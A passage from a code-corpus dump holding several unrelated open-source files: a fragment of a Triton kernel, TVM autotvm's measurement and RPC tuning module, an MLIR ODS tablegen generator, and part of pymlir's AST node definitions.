grid_n = tl.cdiv(N, BLOCK_SIZE_N)
pid_k = pid // grid_n
pid_n = pid % grid_n
# Compute hash
bh_offset = bh_ptr + tl.arange(0, BLOCK_SIZE_K)[:, None] * \
BLOCK_SIZE_N + tl.arange(0, BLOCK_SIZE_N)[None, :]
bh_ptrs = bh_offset + ((pid_k * R3 + pid_n * R2 + R1) %
R0) % (H - BLOCK_SIZE_K * BLOCK_SIZE_N)
b_ptrs = b_ptr + pid_k * BLOCK_SIZE_K * stride_bk + pid_n * BLOCK_SIZE_N * stride_bn + \
tl.arange(0, BLOCK_SIZE_K)[:, None] * \
stride_bk + tl.arange(0, BLOCK_SIZE_N)[None, :]
bh = tl.load(bh_ptrs)
tl.store(b_ptrs, bh)
``` |
{
"source": "Jokeren/tvm",
"score": 2
} |
#### File: autotvm/measure/measure_methods.py
```python
import logging
import os
import time
from random import getrandbits
import threading
import numpy as np
from ... import ir_pass, build, build_config, nd, context, TVMError, register_func, \
target as _target, rpc as _rpc
from ...contrib import nvcc, util, ndk
from ..util import get_const_tuple
from ..env import AutotvmGlobalScope
from ..task.space import InstantiationError
from .measure import MeasureResult, MeasureErrorNo
from .local_executor import LocalExecutor
logger = logging.getLogger('autotvm')
class HashMismatchError(ValueError):
"""Raised when the code hash of a submitted config doesn't match that on the
measure side """
pass
def request_remote(device_key, tracker_addr=None, priority=1, timeout=60):
"""request a remote session
Parameters
----------
device_key: string
device key of registered device in tracker
tracker_addr: Tuple(string, int), optional
The address of rpc tracker in (host, port) format.
If is none, will use environment variable "TVM_TRACKER_HOST"
and "TVM_TRACKER_PORT"
priority: int, optional
The priority of this request, larger is more prior
timeout: float, optional
The timeout of this session (units: seconds)
Returns
------
session: RPCSession
"""
# connect to the tracker
if tracker_addr:
host = tracker_addr[0] or os.environ['TVM_TRACKER_HOST']
port = tracker_addr[1] or int(os.environ['TVM_TRACKER_PORT'])
else:
host = os.environ['TVM_TRACKER_HOST']
port = int(os.environ['TVM_TRACKER_PORT'])
tracker = _rpc.connect_tracker(host, port)
remote = tracker.request(device_key, priority=priority,
session_timeout=timeout)
return remote
def check_remote(target, device_key, tracker_addr=None, priority=2, timeout=10):
"""
Check the availability of a remote device
Parameters
----------
target: Target
The wanted compilation target
device_key: string
device key of registered device in tracker
tracker_addr: Tuple(string, int), optional
The address of rpc tracker in (host, port) format.
If is none, will use environment variable "TVM_TRACKER_HOST"
and "TVM_TRACKER_PORT"
priority: int, optional
The priority of this request, larger is more prior
timeout: float, optional
The timeout of this check (units: seconds).
If time is out, a RuntimerError will be raised.
"""
def _check():
remote = request_remote(device_key, tracker_addr, priority)
remote.context(str(target))
t = threading.Thread(target=_check,)
t.start()
t.join(timeout)
return not t.is_alive()
def create_measure_batch(task, option):
"""Get a standard measure_batch function.
Parameters
----------
task: tvm.autotvm.task.Task
The tuning task
option: dict
The option for measuring generated code.
You should use the return value of function :any:`measure_option` for this argument.
Returns
-------
measure_batch: callable
a callback function to measure a batch of configs
"""
from ..database import filter_inputs
measure_func = option['measure_func']
number, repeat = option['number'], option['repeat']
timeout, n_parallel, do_fork = option['timeout'], option['n_parallel'], option['do_fork']
build_func = option['build_func']
check_correctness = option['check_correctness']
replay_db = option['replay_db']
executor = LocalExecutor(timeout=timeout, do_fork=do_fork)
# convert convenient string to function object
attach_objects = None
if measure_func == 'local':
# start temporary rpc tracker and rpc server for the user
from ...rpc.tracker import Tracker
from ...rpc.server import Server
tracker = Tracker('localhost', port=9000, port_end=10000, silent=True)
device_key = '$local$device$%d' % tracker.port
server = Server('localhost', port=9000, port_end=10000,
key=device_key,
use_popen=True, silent=True,
tracker_addr=(tracker.host, tracker.port))
measure_func = rpc(device_key, tracker.host, tracker.port)
attach_objects = (server, tracker)
build_kwargs = {}
if build_func == 'default':
build_func = default_build_func
if build_func == 'ndk':
build_func = default_build_func
build_kwargs['use_ndk'] = True
# check the availability of remote devices
if hasattr(measure_func, 'rpc_info'):
rpc_info = measure_func.rpc_info
if check_remote(task.target, rpc_info['key'], (rpc_info['host'], rpc_info['port'])):
logger.info("Get devices for measurement successfully!")
else:
raise RuntimeError("Cannot get remote devices from the tracker. "
"Please check the status of tracker by "
"'python -m tvm.exec.query_rpc_tracker --port [THE PORT YOU USE]' "
"and make sure you have free devices on the queue status.")
# add device info of cuda and opencl target
if ('cuda' in task.target.keys or 'opencl' in task.target.keys) \
and hasattr(measure_func, 'rpc_info'):
rpc_info = measure_func.rpc_info
add_gpu_target_info(task.target, rpc_info["key"], (rpc_info["host"], rpc_info["port"]),
build_kwargs)
if check_correctness:
# use llvm cpu to generate a reference input/output
# this option works for tuning topi, but might not work for you custom op
with _target.create("llvm"):
s, arg_bufs = task.instantiate(task.config_space.get(0))
ref_input = [np.random.uniform(size=get_const_tuple(x.shape)).astype(x.dtype)
for x in arg_bufs]
func = build(s, arg_bufs, "llvm")
tvm_buf = [nd.array(x) for x in ref_input]
func(*tvm_buf)
ref_output = [x.asnumpy() for x in tvm_buf]
else:
ref_input = ref_output = None
def measure_batch(measure_inputs):
"""measure the time cost for a batch of configs in real machines"""
if replay_db is not None:
partial_results, measure_inputs = \
filter_inputs(replay_db, measure_inputs, retry=False)
# launch measure jobs in parallel
pack_size = getattr(measure_func, "pack_size", 1) # measure `pack_size` inputs in one job
futures = []
for i in range(0, len(measure_inputs), pack_size):
input_pack = measure_inputs[i:i + pack_size]
ret = executor.submit(
measure_func,
input_pack,
build_func,
build_kwargs,
number,
repeat,
ref_input,
ref_output)
futures.append(ret)
# transform results
results = []
for future in futures:
result = future.get()
if isinstance(result, Exception):
tstamp = time.time()
results.extend([MeasureResult((result,), MeasureErrorNo.FLEET_ERROR,
timeout, tstamp)] * pack_size)
else:
results.extend(result)
if replay_db is not None:
result_idx = 0
for i in range(len(partial_results)):
if partial_results[i] is None:
partial_results[i] = results[result_idx]
result_idx += 1
return partial_results
return results
measure_batch.n_parallel = n_parallel
# attach server and tracker object to avoid them of being garbage-collected
measure_batch.attach_objects = attach_objects
return measure_batch
def rpc(key,
host=None,
port=None,
priority=1,
session_timeout=60,
pack_size=1):
"""
Create a standard measure_func which uses RPC Tracker for measurement.
This measure_func will request a device from the RPC Tracker and
upload the built binary library to that device for measurement.
Parameters
----------
key: str
The registered key of the device in tracker. The tuner will request devices for
measurement by this key.
host: str, optional
The hostname of RPC Tracker. If not set, will use environment variable "TVM_TRACKER_HOST"
port: int, optional
The port of RPC Tracker. If not set, will use environment variable "TVM_TRACKER_PORT"
priority: int, optional
Priority of this task, used by scheduler in tracker
session_timeout: int, optional
Timeout of rpc session
pack_size: int, optional
The number of configs measure in one RPC session.
Usually this can be set to 1. If your device has high overhead to establish a
rpc connection, set this higher.
"""
def fmeasure(input_pack, build_func, build_kwargs, number, repeat, ref_input, ref_output):
"""Do measurement for a list of inputs inside a same RPC session.
Parameters
----------
input_pack: List of MeasureInput
The inputs of measurement
build_func: callable
Function for building the code. see :any:`default_build_func` for example
build_kwargs: dict
Extra arguments for build_func
number : int, optional
Number of times to do the measurement for average
repeat : int, optional
Number of times to repeat the measurement.
In total, the generated code will be run (1 + number x repeat) times,
where the first one is warm up. The returned result contains `repeat` costs,
each of which is the average of `number` test run.
ref_input: List of numpy array
Reference input for correctness check
ref_output: List of numpy array
Reference output for correctness check
Returns
-------
results: List of MeasureResult
The results for input_pack
"""
remote = request_remote(key, (host, port), priority, session_timeout)
res = _measure_common(input_pack, build_func, build_kwargs, number, repeat,
ref_input, ref_output,
remote)
return res
fmeasure.pack_size = pack_size
fmeasure.rpc_info = {"key": key, "host": host, "port": port}
return fmeasure
def _measure_common(input_pack, build_func, build_kwargs, number, repeat,
ref_input=None, ref_output=None, remote=None):
"""Measure the time cost for a pack of inputs.
(Note: A pack is a list of inputs which will be measured inside a same RPC session)
Parameters
----------
input_pack : list of MeasureInput
The inputs we need to evaluate
build_func : function takes MeasureInput returns tuple of (time_func, ctx, args)
The build function used to build each input.
build_kwargs: Dict
The extra keyword arguments to build_func
number : int, optional
Number of times to do the measurement for average
repeat : int, optional
Number of times to repeat the measurement.
In total, the generated code will be run (1 + number x repeat) times,
where the first one is warm up. The returned result contains `repeat` costs,
each of which is the average of `number` test run.
ref_input: Array of np.ndarray, optional
Reference input for checking correctness
ref_output: Array of np.ndarray, optional
Reference output for checking correctness
remote: RPCSession, optional
The remote RPC session
Returns
-------
res_pack : Array of MeasureResult
The list of results of measurement.
"""
res_pack = []
tmp_dir = util.tempdir() if remote else None
for inp in input_pack:
tic = time.time()
# build function
try:
func, arg_bufs, filename = build_func(inp, tmp_dir, **build_kwargs)
except TVMError as exc:
tstamp = time.time()
msg = str(exc)
if "Stack trace returned" in msg:
msg = msg[:msg.index("Stack trace returned")]
if "InstantiationError" in msg:
try:
msg = msg.split('\n')[-2].split(": ")[1]
except Exception: # pylint: disable=broad-except
pass
res_pack.append(MeasureResult((InstantiationError(msg),),
MeasureErrorNo.INSTANTIATION_ERROR,
tstamp - tic, tstamp))
else:
res_pack.append(MeasureResult((RuntimeError(msg),),
MeasureErrorNo.COMPILE_HOST,
tstamp - tic, tstamp))
continue
except InstantiationError as e:
tstamp = time.time()
res_pack.append(MeasureResult((InstantiationError(str(e)),),
MeasureErrorNo.INSTANTIATION_ERROR,
tstamp - tic, tstamp))
continue
# upload built module
if remote:
remote.upload(tmp_dir.relpath(filename))
func = remote.load_module(filename)
ctx = remote.context(str(inp.target), 0)
time_f = func.time_evaluator(
func.entry_name, ctx, number=number, repeat=repeat)
else:
ctx = context(str(inp.target), 0)
time_f = func.time_evaluator(
func.entry_name, ctx, number=number, repeat=repeat)
# measure time
errno = MeasureErrorNo.NO_ERROR
try:
if ref_input:
args = [nd.array(x, ctx=ctx) for x in ref_input]
else:
args = [nd.empty(get_const_tuple(x.shape), dtype=x.dtype, ctx=ctx)
for x in arg_bufs]
costs = time_f(*args).results
if len(costs) > 2: # remove largest and smallest value to reduce variance
costs = list(costs)
costs.sort()
costs = tuple(costs[1:-1])
if ref_output:
for expected, real in zip(ref_output, args):
if not np.allclose(expected, real.asnumpy(), rtol=1e-4):
logger.warning("Wrong Answer!")
errno = MeasureErrorNo.WRONG_ANSWER
except TVMError as exc:
msg = str(exc)
if "Stack trace returned" in msg:
msg = msg[:msg.index("Stack trace returned")]
costs = (RuntimeError(msg),)
errno = MeasureErrorNo.RUNTIME_DEVICE
tstamp = time.time()
res_pack.append(MeasureResult(costs, errno, tstamp - tic, tstamp))
return res_pack
def default_build_func(inp, tmp_dir=None, **kwargs):
"""Build function module. Exception will be raised when any error occurs
Parameters
----------
inp: MeasureInput
The input of this measurement
tmp_dir: tvm.contrib.util.TempDirectory, optional
The temporary directory for exporting built binary library.
If is not None (in RPC mode), the library in this directory will be uploaded to
remote devices.
kwargs: Dict, optional
Other extra arguments
Returns
-------
func: Function
TVM built function. Typically this is the return value of tvm.build.
args: Array of Buffer or Tensor
The argument list for the function. Typically this is the second argument of tvm.build.
filename: str
The filename of the output build library
"""
# build function
with inp.target:
s, args = inp.task.instantiate(inp.config)
# check invalidity of template and code hash consistency
if not inp.config.valid():
raise InstantiationError(inp.config.errors)
code_hash = getattr(s, 'code_hash', None)
if inp.config.code_hash != code_hash:
raise HashMismatchError('got {0:s}, expected {1:s}'
.format(str(inp.config.code_hash), str(code_hash)))
opts = {}
if "check_gpu" in kwargs: # Add verify pass to filter out invalid configs in advance.
opts["add_lower_pass"] = [(2, gpu_verify_pass(**kwargs['check_gpu']))]
if 'cuda_arch' in kwargs:
set_cuda_target_arch(kwargs['cuda_arch'])
with build_config(**opts):
func = build(s, args, target_host=inp.task.target_host)
# export library to temp directory
if tmp_dir:
if kwargs.get('use_ndk', False): # for Android NDK
filename = "tmp_func_%0x.so" % getrandbits(64)
func.export_library(tmp_dir.relpath(filename), ndk.create_shared)
else:
filename = "tmp_func_%0x.tar" % getrandbits(64)
func.export_library(tmp_dir.relpath(filename))
else:
filename = None
return func, args, filename
def add_gpu_target_info(target, device_key, rpc_tracker_addr, kwargs):
"""Add device info for gpu target.
The info will be used to check the validity of generated code."""
remote = request_remote(device_key, rpc_tracker_addr)
ctx = remote.context(str(target), 0)
max_dims = ctx.max_thread_dimensions
kwargs['check_gpu'] = {
'max_shared_memory_per_block': ctx.max_shared_memory_per_block,
'max_threads_per_block': ctx.max_threads_per_block,
'max_thread_x': max_dims[0],
'max_thread_y': max_dims[1],
'max_thread_z': max_dims[2],
}
if 'cuda' in target.keys:
kwargs["cuda_arch"] = "sm_" + "".join(ctx.compute_version.split('.'))
def set_cuda_target_arch(arch):
"""set target architecture of nvcc compiler"""
AutotvmGlobalScope.current.cuda_target_arch = arch
@register_func
def tvm_callback_cuda_compile(code):
"""use nvcc to generate ptx code for better optimization"""
ptx = nvcc.compile_cuda(code, target="ptx", arch=AutotvmGlobalScope.current.cuda_target_arch)
return ptx
def gpu_verify_pass(**kwargs):
"""Verify the validity of a gpu kernel.
This pass will check memory usage and number of threads per block.
"""
def verify_pass(stmt):
valid = ir_pass.VerifyGPUCode(stmt, kwargs)
if not valid:
raise InstantiationError("Skipped because of invalid gpu kernel")
return stmt
return verify_pass
``` |
{
"source": "joker-eph/mlir-npcomp",
"score": 2
} |
#### File: torch_mlir_utils/codegen/generate_ods.py
```python
from typing import TextIO
import argparse
from contextlib import contextmanager
import importlib
import logging
import re
import sys
import textwrap
from .registry import *
_INDENT = " "
class OdsEmitter:
ods_prefix = "ATen_"
ods_suffix = "Op"
ods_value_template = "ATen_ImmutableTensorOp"
ods_ref_template = "ATen_RefTensorOp"
op_prefix = ""
def __init__(self, r: OpRegistry, out: TextIO):
super().__init__()
self.r = r
self.out = out
self.indent_level = 0
def emit_ods(self):
for op_m in self.r.mappings:
if isinstance(op_m, SimpleOpMapping):
self._emit_simple_op_mapping(op_m)
else:
logging.warn(f"Unrecognized op mapping type: {op_m!r}")
def _emit_simple_op_mapping(self, op_m: SimpleOpMapping):
identifier = (f"{self.ods_prefix}"
f"{_snakecase_to_camelcase(op_m.mlir_operation_name)}"
f"{self.ods_suffix}")
traits = []
if op_m.is_outref_form:
template_name = self.ods_ref_template
summary = "See non-inplace op variant."
description = ""
else:
template_name = self.ods_value_template
summary, description = _split_docstring(op_m.op_f.__doc__)
if not op_m.is_outref_form:
traits.append("NoSideEffect")
self.print(f"def {identifier}: {template_name}"
f"<{_quote(op_m.mlir_operation_name)}, ["
f"{', '.join(traits)}"
f"]> {{")
# Summary.
with self.indent():
self.print(f"let summary = {_quote(summary)};")
# Arguments.
with self.indent():
self.print("let arguments = (ins")
with self.indent():
operand_len = len(op_m.operand_map)
for index, (_, value_spec) in enumerate(op_m.operand_map):
is_last = index == operand_len - 1
self.print(f"{value_spec.mlir_ods_predicate}:${value_spec.name}",
end="\n" if is_last else ",\n")
self.print(");")
# Results (omitted if an outref/inplace form).
with self.indent():
if op_m.is_outref_form:
self.print("let results = (outs);")
else:
self.print("let results = (outs")
with self.indent():
result_len = len(op_m.result_map)
for index, (_, value_spec) in enumerate(op_m.result_map):
is_last = index == result_len - 1
self.print(f"{value_spec.mlir_ods_predicate}:${value_spec.name}",
end="\n" if is_last else ",\n")
self.print(");")
# Description and extra class declarations.
with self.indent():
if description:
quoted_description = _quote_multiline_docstring(
description + op_m.append_description,
indent_level=self.indent_level)
self.print(f"let description = {quoted_description};")
self.print("}\n")
@contextmanager
def indent(self, level=1):
self.indent_level += level
yield
self.indent_level -= level
assert self.indent_level >= 0, "Unbalanced indentation"
def print(self, s, *, end="\n", indent=True):
if indent and self.indent_level:
self.out.write(_INDENT * self.indent_level)
self.out.write(s)
self.out.write(end)
def _snakecase_to_camelcase(ident: str):
return "".join(x.capitalize() or "_" for x in re.split(r"[\._]", ident))
def _quote(s: str):
s = s.replace(r'"', r'\\"')
return f'"{s}"'
def _quote_multiline_docstring(s: str, indent_level: int = 0):
# TODO: Possibly find a python module to markdown the docstring for better
# document generation.
# Unlikely to contain the delimitter and since just a docstring, be safe.
s = s.replace("}]", "")
# Strip each line.
s = "\n".join([l.rstrip() for l in s.splitlines()])
indent = _INDENT * indent_level
s = textwrap.indent(s, indent + _INDENT)
return "[{\n" + s + "\n" + indent + "}]"
def _split_docstring(docstring: str):
"""Splits the docstring into a summary and description."""
if not docstring:
docstring = ""
lines = docstring.splitlines()
if not lines:
return "", ""
# Skip leading blank lines.
while lines and not lines[0]:
lines = lines[1:]
if len(lines) > 2:
return lines[0], "\n".join(lines[2:])
else:
return lines[0], ""
def main(args):
r = OpRegistry()
# Populate from modules that provide a populate() function.
op_modules = [args.op_module]
for m_name in op_modules:
logging.info(f"Populating from module: {m_name}")
m = importlib.import_module(m_name, package=__package__)
f = getattr(m, "populate")
f(r)
out = sys.stdout
# Write file header.
module_name = sys.modules["__main__"].__loader__.name
banner_lines = [
"//===-------------------------------------------------------*- tablegen -*-===//",
"//",
"// This file is licensed under the Apache License v2.0 with LLVM Exceptions.",
"// See https://llvm.org/LICENSE.txt for license information.",
"// SPDX-License-Identifier: Apache-2.0 WITH LLVM-exception",
"//",
"// Operation summaries and descriptions were systematically derived from public",
"// API docstrings and are licensed accordingly:",
"// https://github.com/pytorch/pytorch/blob/master/LICENSE",
"//===----------------------------------------------------------------------===//",
"// This file is automatically generated. Please do not edit.",
"// Generated via:",
f"// python -m {module_name} {' '.join(sys.argv[1:])}",
"//===----------------------------------------------------------------------===//",
"",
"",
]
banner_lines = [l.strip() for l in banner_lines]
out.write("\n".join(banner_lines))
emitter = OdsEmitter(r, out=out)
emitter.emit_ods()
def _create_argparse():
parser = argparse.ArgumentParser(prog="generate_ods")
parser.add_argument(
"--op_module",
default=".aten_ops",
help="Name of a python module for populating the registry")
return parser
if __name__ == "__main__":
logging.basicConfig(level=logging.DEBUG)
parser = _create_argparse()
args = parser.parse_args()
main(args)
``` |
{
"source": "joker-eph/pymlir",
"score": 3
} |
#### File: pymlir/mlir/astnodes.py
```python
from enum import Enum, auto
from typing import Any, List, Union
from lark import Token
class Node(object):
""" Base MLIR AST node object. """
# Static field defining which fields should be used in this node
_fields_: List[str] = []
def __init__(self, node: Token = None, **fields):
# Set each field separately
if node is not None and isinstance(node, list):
for fname, fval in zip(self._fields_, node):
setattr(self, fname, fval)
# Set the defined fields
for k, v in fields.items():
setattr(self, k, v)
def dump_ast(self) -> str:
""" Dumps the AST node and its fields in raw AST format. For example:
Module(name="example", body=[])
:note: Due to the way objects are constructed, this format can be
parsed back by Python to the same AST.
:return: String representing the AST in its raw format.
"""
return (type(self).__name__ + '(' + ', '.join(
f + '=' + _dump_ast_or_value(getattr(self, f))
for f in self._fields_) + ')')
def dump(self, indent: int = 0) -> str:
""" Dumps the AST node and its children in MLIR format.
:return: String representing the AST in MLIR.
"""
return '<UNIMPLEMENTED>'
def __repr__(self):
return (type(self).__name__ + '(' + ', '.join(
f + '=' + str(getattr(self, f)) for f in self._fields_) + ')')
def pretty(self):
return self.dump()
# result = self.dump_ast()
# lines = ['']
# indent = 0
# for char in result:
# if char == '[':
# indent += 1
# if char == ']':
# indent -= 1
# if char != '\n':
# lines[-1] += char
# if char in '[\n':
# lines.append(indent * ' ')
#
# return '\n'.join(lines)
class StringLiteral(object):
def __init__(self, value: str):
self.value = value
def __str__(self):
return '"%s"' % self.value
def __repr__(self):
return '"%s"' % self.value
##############################################################################
# Identifiers
class Identifier(Node):
_fields_ = ['value']
# Static field representing the prefix of this identifier. Used for ease
# of MLIR output
_prefix_: str = ''
def dump(self, indent: int = 0) -> str:
return self._prefix_ + self.value
class SsaId(Identifier):
_fields_ = ['value', 'index']
_prefix_ = '%'
def __init__(self, node: Token = None, **fields):
self.value = node[0]
self.index = node[1] if len(node) > 1 else None
super().__init__(None, **fields)
def dump(self, indent: int = 0) -> str:
if self.index:
return self._prefix_ + self.value + ("#%s" % self.index)
return self._prefix_ + self.value
class SymbolRefId(Identifier):
_prefix_ = '@'
class BlockId(Identifier):
_prefix_ = '^'
class TypeAlias(Identifier):
_prefix_ = '!'
class AttrAlias(Identifier):
_prefix_ = '#'
class MapOrSetId(Identifier):
_prefix_ = '#'
##############################################################################
# Types
class Type(Node):
pass
class Dimension(Type):
_fields_ = ['value']
def __init__(self, node: Token = None, **fields):
self.value = None
try:
if isinstance(node[0], int):
self.value = node[0]
except (IndexError, TypeError):
pass # In case of an unknown size
super().__init__(None, **fields)
def dump(self, indent: int = 0) -> str:
return str(self.value or '?')
class NoneType(Type):
def dump(self, indent: int = 0) -> str:
return 'none'
class FloatTypeEnum(Enum):
f16 = auto()
bf16 = auto()
f32 = auto()
f64 = auto()
class FloatType(Type):
_fields_ = ['type']
def __init__(self, node: Token = None, **fields):
super().__init__(node, **fields)
if 'type' not in fields:
self.type = FloatTypeEnum[node[0]]
def dump(self, indent: int = 0) -> str:
return self.type.name
class IndexType(Type):
def dump(self, indent: int = 0) -> str:
return 'index'
class IntegerType(Type):
_fields_ = ['width']
def dump(self, indent: int = 0) -> str:
return 'i' + str(self.width)
class ComplexType(Type):
_fields_ = ['type']
def dump(self, indent: int = 0) -> str:
return 'complex<%s>' % self.type.dump(indent)
class TupleType(Type):
_fields_ = ['types']
def __init__(self, node: Token = None, **fields):
self.types = node
super().__init__(None, **fields)
def dump(self, indent: int = 0) -> str:
return 'tuple<%s>' % dump_or_value(self.types, indent)
class VectorType(Type):
_fields_ = ['dimensions', 'element_type']
def dump(self, indent: int = 0) -> str:
return 'vector<%s>' % ('x'.join(
dump_or_value(t, indent)
for t in self.dimensions) + 'x' + self.element_type.dump(indent))
class RankedTensorType(Type):
_fields_ = ['dimensions', 'element_type']
def dump(self, indent: int = 0) -> str:
return 'tensor<%s>' % ('x'.join(
t.dump(indent)
for t in self.dimensions) + 'x' + self.element_type.dump(indent))
class UnrankedTensorType(Type):
_fields_ = ['element_type']
def __init__(self, node: Token = None, **fields):
# Ignore unranked dimension list
super().__init__(node[1:], **fields)
def dump(self, indent: int = 0) -> str:
return 'tensor<*x%s>' % self.element_type.dump(indent)
class RankedMemRefType(Type):
_fields_ = ['dimensions', 'element_type', 'layout', 'space']
def __init__(self, node: Token = None, **fields):
self.dimensions = node[0]
self.element_type = node[1]
self.layout = None
self.space = None
if len(node) > 2:
if node[2].data == 'memory_space':
self.space = node[2].children[0]
elif node[2].data == 'layout_specification':
self.layout = node[2].children[0]
super().__init__(None, **fields)
def dump(self, indent: int = 0) -> str:
result = 'memref<%s' % ('x'.join(
t.dump(indent)
for t in self.dimensions) + 'x' + self.element_type.dump(indent))
if self.layout is not None:
result += ', ' + self.layout.dump(indent)
if self.space is not None:
result += ', ' + dump_or_value(self.space, indent)
return result + '>'
class UnrankedMemRefType(Type):
_fields_ = ['element_type', 'space']
def __init__(self, node: Token = None, **fields):
self.element_type = node[0]
self.space = None
if len(node) > 1:
self.space = node[1].children[0]
super().__init__(None, **fields)
def dump(self, indent: int = 0) -> str:
result = 'memref<%s' % ('*x' + self.element_type.dump(indent))
if self.space is not None:
result += ', ' + dump_or_value(self.space, indent)
return result + '>'
class OpaqueDialectType(Type):
_fields_ = ['dialect', 'contents']
def dump(self, indent: int = 0) -> str:
return '!%s<"%s">' % (self.dialect, self.contents)
class PrettyDialectType(Type):
_fields_ = ['dialect', 'type', 'body']
def dump(self, indent: int = 0) -> str:
return '!%s.%s<%s>' % (self.dialect, self.type, ', '.join(
dump_or_value(item, indent) for item in self.body))
class FunctionType(Type):
_fields_ = ['argument_types', 'result_types']
def dump(self, indent: int = 0) -> str:
result = '(%s)' % ', '.join(
dump_or_value(arg, indent) for arg in self.argument_types)
result += ' -> '
if not self.result_types:
result += '()'
elif len(self.result_types) == 1:
result += dump_or_value(self.result_types[0], indent)
else:
result += '(%s)' % ', '.join(
dump_or_value(res, indent) for res in self.result_types)
return result
class StridedLayout(Node):
_fields_ = ['offset', 'strides']
def dump(self, indent: int = 0) -> str:
return 'offset: %s, strides: %s' % (dump_or_value(
self.offset, indent), dump_or_value(self.strides, indent))
##############################################################################
# Attributes
# Attribute entries
class AttributeEntry(Node):
_fields_ = ['name', 'value']
def __init__(self, node: Token = None, **fields):
self.name = node[0]
self.value = node[1] if len(node) > 1 else None
super().__init__(None, **fields)
def dump(self, indent: int = 0) -> str:
if self.value:
return '%s = %s' % (dump_or_value(self.name, indent),
dump_or_value(self.value, indent))
return dump_or_value(self.name, indent)
class DialectAttributeEntry(Node):
_fields_ = ['dialect', 'name', 'value']
def __init__(self, node: Token = None, **fields):
self.dialect = node[0]
self.name = node[1]
self.value = node[2] if len(node) > 2 else None
super().__init__(None, **fields)
def dump(self, indent: int = 0) -> str:
if self.value:
return '%s.%s = %s' % (dump_or_value(self.dialect, indent),
dump_or_value(self.name, indent),
dump_or_value(self.value, indent))
return '%s.%s' % (dump_or_value(self.dialect, indent),
dump_or_value(self.name, indent))
class AttributeDict(Node):
_fields_ = ['values']
def __init__(self, node: Token = None, **fields):
self.values = node
super().__init__(None, **fields)
def dump(self, indent: int = 0) -> str:
return '{%s}' % ', '.join(
dump_or_value(v, indent) for v in self.values)
# Default attribute implementation
class Attribute(Node):
_fields_ = ['value']
def dump(self, indent: int = 0) -> str:
return dump_or_value(self.value, indent)
class ArrayAttr(Attribute):
def __init__(self, node: Token = None, **fields):
self.value = node
super().__init__(None, **fields)
def dump(self, indent: int = 0) -> str:
return '[%s]' % dump_or_value(self.value, indent)
class BoolAttr(Attribute):
pass
class DictionaryAttr(Attribute):
def __init__(self, node: Token = None, **fields):
self.value = node
super().__init__(None, **fields)
def dump(self, indent: int = 0) -> str:
return '{%s}' % dump_or_value(self.value, indent)
class ElementsAttr(Attribute):
pass
class DenseElementsAttr(ElementsAttr):
_fields_ = ['attribute', 'type']
def dump(self, indent: int = 0) -> str:
return 'dense<%s> : %s' % (self.attribute.dump(indent),
self.type.dump(indent))
class OpaqueElementsAttr(ElementsAttr):
_fields_ = ['dialect', 'attribute', 'type']
def dump(self, indent: int = 0) -> str:
return 'opaque<%s, %s> : %s' % (self.dialect,
dump_or_value(self.attribute, indent),
self.type.dump(indent))
class SparseElementsAttr(ElementsAttr):
_fields_ = ['indices', 'values', 'type']
def dump(self, indent: int = 0) -> str:
return 'sparse<%s, %s> : %s' % (dump_or_value(self.indices, indent),
dump_or_value(self.values, indent),
self.type.dump(indent))
class PrimitiveAttribute(Attribute):
_fields_ = ['value', 'type']
def __init__(self, node: Token = None, **fields):
self.value = node[0]
if len(node) > 1:
self.type = node[1]
else:
self.type = None
super().__init__(None, **fields)
def dump(self, indent: int = 0) -> str:
return dump_or_value(self.value, indent) + (
': %s' % self.type.dump(indent) if self.type is not None else '')
class FloatAttr(PrimitiveAttribute):
pass
class IntegerAttr(PrimitiveAttribute):
pass
class StringAttr(PrimitiveAttribute):
pass
class IntSetAttr(Attribute):
pass # Use default implementation
class TypeAttr(Attribute):
pass # Use default implementation
class SymbolRefAttr(Attribute):
_fields_ = ['path']
def __init__(self, node: Token = None, **fields):
self.path = node
super().__init__(None, **fields)
def dump(self, indent: int = 0) -> str:
return '::'.join(dump_or_value(p, indent) for p in self.path)
class UnitAttr(Attribute):
_fields_ = []
def dump(self, indent: int = 0) -> str:
return 'unit'
##############################################################################
# Operations
class OpResult(Node):
_fields_ = ['value', 'count']
def __init__(self, node: Token = None, **fields):
self.value = node[0]
if len(node) > 1:
self.count = node[1]
else:
self.count = None
super().__init__(None, **fields)
def dump(self, indent: int = 0) -> str:
return self.value.dump(indent) + (
(':' + dump_or_value(self.count, indent)) if self.count else '')
class Operation(Node):
_fields_ = ['result_list', 'op', 'location']
def __init__(self, node: Token = None, **fields):
index = 0
if isinstance(node[0], list):
self.result_list = node[index]
index += 1
else:
self.result_list = []
self.op = node[index]
index += 1
if len(node) > index:
self.location = node[index]
else:
self.location = None
super().__init__(None, **fields)
def dump(self, indent: int = 0) -> str:
result = ''
if self.result_list:
result += '%s = ' % (', '.join(
dump_or_value(r, indent) for r in self.result_list))
result += dump_or_value(self.op, indent)
if self.location:
result += ' ' + self.location.dump(indent)
return result
class Op(Node):
pass
class GenericOperation(Op):
_fields_ = ['name', 'args', 'attributes', 'type']
def __init__(self, node: Token = None, **fields):
index = 0
self.name = node[index]
index += 1
if len(node) > index and isinstance(node[index], list):
self.args = node[index]
index += 1
else:
self.args = []
if len(node) > index and isinstance(node[index], AttributeDict):
self.attributes = node[index]
index += 1
else:
self.attributes = None
if len(node) > index:
self.type = node[index]
else:
self.type = None
super().__init__(None, **fields)
def dump(self, indent: int = 0) -> str:
result = '%s' % self.name
result += '(%s)' % ', '.join(
dump_or_value(arg, indent) for arg in self.args)
if self.attributes:
result += ' ' + dump_or_value(self.attributes, indent)
if isinstance(self.type, list):
result += ' : ' + ', '.join(
dump_or_value(t, indent) for t in self.type)
else:
result += ' : ' + dump_or_value(self.type, indent)
return result
class CustomOperation(Op):
_fields_ = ['namespace', 'name', 'args', 'type']
def __init__(self, node: Token = None, **fields):
self.namespace = node[0]
self.name = node[1]
if len(node) == 4:
self.args = node[2]
self.type = node[3]
else:
self.args = None
self.type = node[2]
super().__init__(None, **fields)
def dump(self, indent: int = 0) -> str:
result = '%s.%s' % (self.namespace, self.name)
if self.args:
result += ' %s' % ', '.join(
dump_or_value(arg, indent) for arg in self.args)
if isinstance(self.type, list):
result += ' : ' + ', '.join(
dump_or_value(t, indent) for t in self.type)
else:
result += ' : ' + dump_or_value(self.type, indent)
return result
class Location(Node):
_fields_ = ['value']
def dump(self, indent: int = 0) -> str:
return 'loc(%s)' % dump_or_value(self.value, indent)
class FileLineColLoc(Location):
_fields_ = ['file', 'line', 'col']
def dump(self, indent: int = 0) -> str:
return 'loc(%s:%d:%d)' % (self.file, self.line, self.col)
##############################################################################
# Modules, functions, and blocks
class Module(Node):
_fields_ = ['name', 'attributes', 'body', 'location']
